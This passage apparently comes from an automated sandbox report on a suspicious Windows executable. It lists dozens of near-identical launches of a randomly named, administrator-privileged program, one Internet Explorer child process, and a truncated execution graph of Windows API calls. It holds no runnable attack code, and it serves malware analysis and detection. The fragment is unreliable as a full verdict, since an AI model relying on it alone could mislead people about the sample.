                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:14
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:15
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:16
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:17
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:18
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:19
                                                                Start time:03:04:52
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:20
                                                                Start time:03:04:52
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:21
                                                                Start time:03:04:52
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:22
                                                                Start time:03:04:52
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:23
                                                                Start time:03:04:53
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:24
                                                                Start time:03:04:53
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3408 CREDAT:275457 /prefetch:2
                                                                Imagebase:0x880000
                                                                File size:815'304 bytes
                                                                MD5 hash:8A590F790A98F3D77399BE457E01386A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:25
                                                                Start time:03:04:54
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:26
                                                                Start time:03:04:54
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:27
                                                                Start time:03:04:54
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

Target ID: 29
Start time: 03:04:54
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 30
Start time: 03:04:54
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 31
Start time: 03:04:55
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 32
Start time: 03:04:55
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 33
Start time: 03:04:55
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 34
Start time: 03:04:55
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 35
Start time: 03:04:55
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 36
Start time: 03:04:55
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 37
Start time: 03:04:55
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 38
Start time: 03:04:56
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 39
Start time: 03:04:56
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 40
Start time: 03:04:56
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 41
Start time: 03:04:56
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 42
Start time: 03:04:56
Start date: 31/12/2024
Path: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
Imagebase: 0x1230000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false
Execution Graph

Execution Coverage: 15.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.6%
Total number of Nodes: 1339
Total number of Limit Nodes: 20
4963->4964 4964->4947 4966 603f62 4965->4966 4967 603f9c 13 API calls 4966->4967 4968 603f7b 4966->4968 4967->4966 4968->4946 4970 603872 GetStdHandle WriteFile GetStdHandle WriteFile 4969->4970 4971 6038c9 4969->4971 4970->4315 4973 6038d2 MessageBoxA 4971->4973 4974 6038e5 4971->4974 4973->4974 4974->4315 5661 6075f0 5662 607534 56 API calls 5661->5662 5663 6075f8 5662->5663 5174 607cf2 5175 607cf4 5174->5175 5179 607c80 GetLocaleInfoA 5175->5179 5185 603c34 5179->5185 5186 603c3f 5185->5186 5343 602f7a 5344 602f6b RegCloseKey 5343->5344 5345 608742 5346 608744 5345->5346 5347 60879e 5346->5347 5359 603790 5346->5359 5349 608768 5350 60878a 5349->5350 5351 603a40 25 API calls 5349->5351 5363 60796c 5350->5363 5351->5350 5355 608794 5370 608288 GetModuleHandleA 5355->5370 5357 608799 5373 607ee4 5357->5373 5360 60379c 5359->5360 5361 604b70 56 API calls 5360->5361 5362 6037b1 5360->5362 5361->5360 5362->5349 5364 607364 56 API calls 5363->5364 5365 60797e 5364->5365 5366 607364 56 API calls 5365->5366 5367 607995 5366->5367 5368 607a70 GetVersionExA 5367->5368 5369 607a87 5368->5369 5369->5355 5371 608299 GetProcAddress 5370->5371 5372 6082a9 5370->5372 5371->5372 5372->5357 5374 607eec 5373->5374 5374->5374 5447 607d6c GetThreadLocale 5374->5447 5379 607f1a GetThreadLocale 5381 606adc 26 API calls 5379->5381 5382 607f33 5381->5382 5383 603a40 25 API calls 5382->5383 5384 607f40 5383->5384 5385 606adc 26 API calls 5384->5385 5386 607f55 5385->5386 5387 606adc 26 API calls 5386->5387 5388 607f79 5387->5388 5476 606b28 GetLocaleInfoA 5388->5476 5391 606b28 GetLocaleInfoA 5392 607fa9 5391->5392 5393 606adc 26 API calls 5392->5393 5394 607fc3 5393->5394 5395 606b28 GetLocaleInfoA 5394->5395 5396 607fe0 5395->5396 5397 606adc 26 API calls 5396->5397 5398 607ffa 5397->5398 5478 606e14 5398->5478 5401 603a40 25 API calls 5402 608012 5401->5402 5403 606adc 26 API calls 5402->5403 5404 608027 5403->5404 5405 606e14 28 API calls 5404->5405 5406 608032 5405->5406 5407 603a40 
25 API calls 5406->5407 5408 60803f 5407->5408 5409 606b28 GetLocaleInfoA 5408->5409 5410 60804d 5409->5410 5411 606adc 26 API calls 5410->5411 5412 608067 5411->5412 5413 603a40 25 API calls 5412->5413 5414 608074 5413->5414 5415 606adc 26 API calls 5414->5415 5416 608089 5415->5416 5417 603a40 25 API calls 5416->5417 5418 608096 5417->5418 5419 6039ec 11 API calls 5418->5419 5420 60809e 5419->5420 5421 6039ec 11 API calls 5420->5421 5422 6080a6 5421->5422 5423 606adc 26 API calls 5422->5423 5424 6080bb 5423->5424 5425 6080d8 5424->5425 5426 6080c9 5424->5426 5428 603a84 11 API calls 5425->5428 5497 603a84 5426->5497 5429 6080d6 5428->5429 5430 606adc 26 API calls 5429->5430 5432 6080fa 5430->5432 5431 608138 5501 603cac 5431->5501 5432->5431 5434 606adc 26 API calls 5432->5434 5436 60811d 5434->5436 5440 60813a 5436->5440 5441 60812b 5436->5441 5443 603a84 11 API calls 5440->5443 5442 603a84 11 API calls 5441->5442 5442->5431 5443->5431 5448 607d9f 5447->5448 5449 607e8f GetSystemMetrics GetSystemMetrics 5448->5449 5452 607de2 5448->5452 5450 607eb6 5449->5450 5456 607deb 5449->5456 5451 607cf4 14 API calls 5450->5451 5451->5456 5452->5456 5510 607cf4 5452->5510 5454 607e04 5455 607e45 GetStringTypeA 5454->5455 5454->5456 5455->5456 5457 606b8c GetThreadLocale 5456->5457 5459 606bbf 5457->5459 5458 606b50 57 API calls 5458->5459 5459->5458 5460 603a40 25 API calls 5459->5460 5463 606c11 5459->5463 5460->5459 5461 606b50 57 API calls 5461->5463 5462 603a40 25 API calls 5462->5463 5463->5461 5463->5462 5464 606c84 5463->5464 5465 603a10 11 API calls 5464->5465 5466 606c9e 5465->5466 5466->5379 5467 606d64 GetThreadLocale 5466->5467 5468 606adc 26 API calls 5467->5468 5469 606d90 5468->5469 5470 606de5 5469->5470 5471 606da9 GetThreadLocale EnumCalendarInfoA 5469->5471 5474 6039ec 11 API calls 5470->5474 5472 606dc6 5471->5472 5472->5472 5473 606dd2 GetThreadLocale EnumCalendarInfoA 5472->5473 5473->5470 5475 606dfa 5474->5475 5475->5379 5477 606b44 5476->5477 
5477->5391 5479 606e3f GetThreadLocale 5478->5479 5480 6039ec 11 API calls 5478->5480 5481 606adc 26 API calls 5479->5481 5480->5479 5482 606e57 5481->5482 5483 606e70 5482->5483 5495 606ecf 5482->5495 5484 606ec1 5483->5484 5491 606e8c 5483->5491 5486 603a40 25 API calls 5484->5486 5485 606ebc 5488 603a10 11 API calls 5485->5488 5486->5485 5487 607bb4 CharNextA 5487->5495 5489 606fdd 5488->5489 5489->5401 5490 603e44 25 API calls 5490->5495 5491->5485 5492 603bb8 25 API calls 5491->5492 5493 603c68 25 API calls 5491->5493 5492->5491 5493->5491 5494 603c68 25 API calls 5494->5495 5495->5485 5495->5487 5495->5490 5495->5494 5496 603bb8 25 API calls 5495->5496 5496->5495 5499 603a88 5497->5499 5498 603aac 5498->5429 5499->5498 5500 6028b0 11 API calls 5499->5500 5500->5498 5502 603cbd 5501->5502 5503 603ce3 5502->5503 5504 603cfa 5502->5504 5505 603e84 25 API calls 5503->5505 5506 603ab0 25 API calls 5504->5506 5508 603cf0 5505->5508 5506->5508 5507 603d2b 5508->5507 5509 603a40 25 API calls 5508->5509 5509->5507 5511 607c80 13 API calls 5510->5511 5512 607d0c GetCPInfo 5511->5512 5513 607d16 5512->5513 5513->5454 4975 6048c3 lstrcpyn GetThreadLocale GetLocaleInfoA 4976 6049f3 4975->4976 4977 6048fa 4975->4977 4977->4976 4978 60490a lstrlen 4977->4978 4979 604923 4978->4979 4979->4976 4980 604951 lstrcpyn LoadLibraryExA 4979->4980 4981 60497d 4979->4981 4980->4981 4981->4976 4982 604987 lstrcpyn LoadLibraryExA 4981->4982 4982->4976 4983 6049bd lstrcpyn LoadLibraryExA 4982->4983 4983->4976 5518 608744 5519 60879e 5518->5519 5520 60875e 5518->5520 5521 603790 56 API calls 5520->5521 5523 608768 5521->5523 5522 60878a 5525 60796c 56 API calls 5522->5525 5523->5522 5524 603a40 25 API calls 5523->5524 5524->5522 5526 60878f 5525->5526 5527 607a70 GetVersionExA 5526->5527 5528 608794 5527->5528 5529 608288 2 API calls 5528->5529 5530 608799 5529->5530 5531 607ee4 74 API calls 5530->5531 5531->5519 5664 6085c4 5665 6085e1 5664->5665 5666 60872b 5664->5666 5710 60825c 
5665->5710 5668 6085f0 5669 603f9c 13 API calls 5668->5669 5670 60860a 5669->5670 5671 603f9c 13 API calls 5670->5671 5672 60861f 5671->5672 5673 603f9c 13 API calls 5672->5673 5674 608634 5673->5674 5675 6039ec 11 API calls 5674->5675 5676 60863e 5675->5676 5677 6044b4 13 API calls 5676->5677 5678 60864e 5677->5678 5679 6044b4 13 API calls 5678->5679 5680 60865e 5679->5680 5681 603f9c 13 API calls 5680->5681 5682 608673 5681->5682 5683 603f9c 13 API calls 5682->5683 5684 608688 5683->5684 5685 603f9c 13 API calls 5684->5685 5686 60869d 5685->5686 5687 603f9c 13 API calls 5686->5687 5688 6086b2 5687->5688 5689 603f9c 13 API calls 5688->5689 5690 6086c7 5689->5690 5691 6039ec 11 API calls 5690->5691 5692 6086d1 5691->5692 5693 6039ec 11 API calls 5692->5693 5694 6086db 5693->5694 5695 6039ec 11 API calls 5694->5695 5696 6086e5 5695->5696 5697 6039ec 11 API calls 5696->5697 5698 6086ef 5697->5698 5699 6039ec 11 API calls 5698->5699 5700 6086f9 5699->5700 5701 6039ec 11 API calls 5700->5701 5702 608703 5701->5702 5703 6039ec 11 API calls 5702->5703 5704 60870d 5703->5704 5705 6039ec 11 API calls 5704->5705 5706 608717 5705->5706 5707 603ef0 SysFreeString 5706->5707 5708 608721 5707->5708 5709 6039ec 11 API calls 5708->5709 5709->5666 5711 608268 5710->5711 5712 608283 5711->5712 5713 6028b0 11 API calls 5711->5713 5712->5668 5713->5711 4998 607046 4999 607048 VirtualQuery 4998->4999 5000 607091 GetModuleFileNameA 4999->5000 5001 607075 GetModuleFileNameA 4999->5001 5002 6070af 5000->5002 5001->5000 5001->5002 5003 60456c 30 API calls 5002->5003 5004 607146 LoadStringA 5003->5004 5005 607159 5004->5005 5008 606470 5005->5008 5007 6071c8 5009 6064a0 5008->5009 5010 606481 5008->5010 5009->5007 5010->5009 5011 6060f8 56 API calls 5010->5011 5011->5009 5714 602fc7 5715 602f66 RegCloseKey 5714->5715 5716 602fcb 5714->5716 5718 6033c9 5719 604ddc 4 API calls 5718->5719 5720 6033ce 5719->5720 5189 6036ca 5190 6036cf 5189->5190 5195 60344c 5190->5195 5192 6036d4 5193 6036d9 
5192->5193 5194 6034a0 4 API calls 5192->5194 5194->5193 5196 604ddc 4 API calls 5195->5196 5197 60345c 5196->5197 5197->5192 5721 6089cd 5722 6089ac 5721->5722 5723 6044b4 13 API calls 5722->5723 5724 6089ba 5723->5724 5725 603a10 11 API calls 5724->5725 5726 6089c7 5725->5726 5731 6075d5 5732 6075bf 5731->5732 5733 6039ec 11 API calls 5732->5733 5734 6075c7 5733->5734 5735 6039ec 11 API calls 5734->5735 5736 6075cf 5735->5736 5540 60795c 5545 6071e0 5540->5545 5543 6039d4 7 API calls 5544 60796b 5543->5544 5559 607048 VirtualQuery 5545->5559 5547 6071f4 5548 60725c 5547->5548 5549 6071fe 5547->5549 5550 60456c 30 API calls 5548->5550 5568 602a74 5549->5568 5552 607276 LoadStringA MessageBoxA 5550->5552 5554 607292 5552->5554 5554->5543 5558 60722c GetStdHandle WriteFile GetStdHandle WriteFile 5558->5554 5560 607091 GetModuleFileNameA 5559->5560 5561 607075 GetModuleFileNameA 5559->5561 5562 6070af 5560->5562 5561->5560 5561->5562 5563 60456c 30 API calls 5562->5563 5564 607146 LoadStringA 5563->5564 5565 607159 5564->5565 5566 606470 56 API calls 5565->5566 5567 6071c8 5566->5567 5567->5547 5575 602a2c 5568->5575 5571 602984 5572 